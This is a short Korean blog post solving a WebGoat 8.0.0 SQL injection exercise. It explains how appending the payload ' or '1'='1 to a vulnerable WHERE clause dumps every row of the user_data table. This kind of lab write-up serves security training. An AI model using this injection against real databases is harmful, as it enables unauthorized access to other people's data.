SQL 인젝션 문제풀이3(webgoat-8.0.0)
2021. 4. 27. 22:56ㆍ워게임
1. 하얀색 박스안의 폼에서 알맞은 문자를 선택하여 users 테이블의 모든 결과값을 출력하라.
2. select * from user_data where first_name = 'john' and last_name = '
라는 쿼리문이 주어져 있다. 쿼리문 뒤에 ' or '1'='1 구문을 쿼리문의 가장 뒤에 삽입하면,
select * from user_data where first_name = 'john' and last_name = ' ' or '1'='1'이되고
where 절의 조건식이 first_name = 'john' and last_name = ' ' or '1'='1' 항상 참이되므로
user_data테이블의 모든 데이터가 출력된다.
'1' = '1 로 마지막에 닫히는 싱글쿼터 까지 생각할것
'워게임' 카테고리의 다른 글
| XSS 문제풀이1(webgoat-8.0.0) (0) | 2021.04.30 |
|---|---|
| 민감 데이터 노출(webgoat-8.0.0) (0) | 2021.04.30 |
| SQL 인젝션 문제풀이4(webgoat-8.0.0) (0) | 2021.04.27 |
| SQL 인젝션 문제풀이2(webgoat-8.0.0) (0) | 2021.04.27 |
| SQL 인젝션 문제풀이1(webgoat-8.0.0) (0) | 2021.04.27 |